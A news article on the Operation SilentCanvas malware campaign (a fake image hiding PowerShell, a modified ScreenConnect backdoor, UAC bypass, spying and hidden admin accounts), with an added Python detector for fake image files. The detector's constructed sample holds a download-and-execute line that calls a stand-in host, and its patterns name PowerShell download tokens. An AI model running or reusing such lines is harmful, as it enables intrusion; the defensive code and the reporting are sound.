The researchers named this campaign Operation SilentCanvas.
According to reports, the attack begins with a file named sysupdate.jpeg delivered via phishing emails, fake file-sharing links, or fake software updates.
Although the file looks like an ordinary image, it contains no real image data. Instead, it carries a malicious PowerShell script that sets up a hidden environment on the infected device and then downloads additional components from servers controlled by the attackers.
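The mismatch the article describes (a file named .jpeg whose bytes are script, not image data) is something a defender can check directly. The following is an added example, not code from the researchers or the article; the magic-byte table, the script-token list and the two sample files are constructed for illustration.

```python
import re
from pathlib import Path

# Leading bytes a file with this extension should start with (constructed reference table).
MAGIC = {
    ".jpeg": (b"\xff\xd8\xff",),
    ".jpg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}

# Tokens that belong in a PowerShell script, never in image data (hypothetical list, not from the article).
SCRIPT_MARKERS = re.compile(
    rb"(?i)(powershell|invoke-expression|\biex\b|downloadstring|-encodedcommand|frombase64string)"
)


def check_image_file(name: str, data: bytes) -> dict:
    """Return a verdict for a file that claims to be an image.

    Flags the two signs described in the article: an image extension whose
    header bytes are not that image format, and script-like content inside the file.
    """
    ext = Path(name).suffix.lower()
    expected = MAGIC.get(ext)
    header_ok = expected is not None and any(data.startswith(m) for m in expected)
    markers = sorted({m.decode().lower() for m in SCRIPT_MARKERS.findall(data)})
    return {
        "file": name,
        "header_ok": header_ok,
        "script_markers": markers,
        "suspicious": (expected is not None and not header_ok) or bool(markers),
    }


# Constructed samples: a minimal genuine JPEG header, and a fake "image" holding placeholder script text.
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
FAKE_JPEG = (b"# constructed placeholder, not a working script\r\n"
             b"$payload = DownloadString 'http://example.invalid/stage2'\r\n"
             b"IEX $payload\r\n")


def scan_samples() -> list:
    """Run the check over both constructed samples."""
    return [check_image_file("photo.jpeg", REAL_JPEG),
            check_image_file("sysupdate.jpeg", FAKE_JPEG)]


if __name__ == "__main__":
    for verdict in scan_samples():
        print(verdict)
```

The same check applied to a mail gateway or download folder catches the extension/content mismatch before the script is ever executed.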
Abusing a trusted tool
The researchers indicated that the attackers used a modified version of ScreenConnect, a legitimate tool used to remotely access and control corporate devices.
The modified version works as a back door that allows hackers to continuously enter the device without raising suspicions, especially since the program is already used in many institutional work environments.
The attack also relies on advanced techniques to evade security products, including running files directly in memory without writing them to disk, and using trusted Windows tools to bypass the User Account Control (UAC) prompt without alerting the victim.
After a successful compromise, the attackers can carry out a wide range of espionage and control operations, including live screen monitoring, video recording, audio capture via the microphone, password theft, keystroke logging, and exfiltration of confidential files over encrypted channels.
The software can also create a hidden environment that the user does not notice, allowing attackers to freely operate their tools without being detected.
Experts warned that the software is also capable of creating hidden administrative accounts within the system to ensure continued access even after the device is rebooted. (Erm News)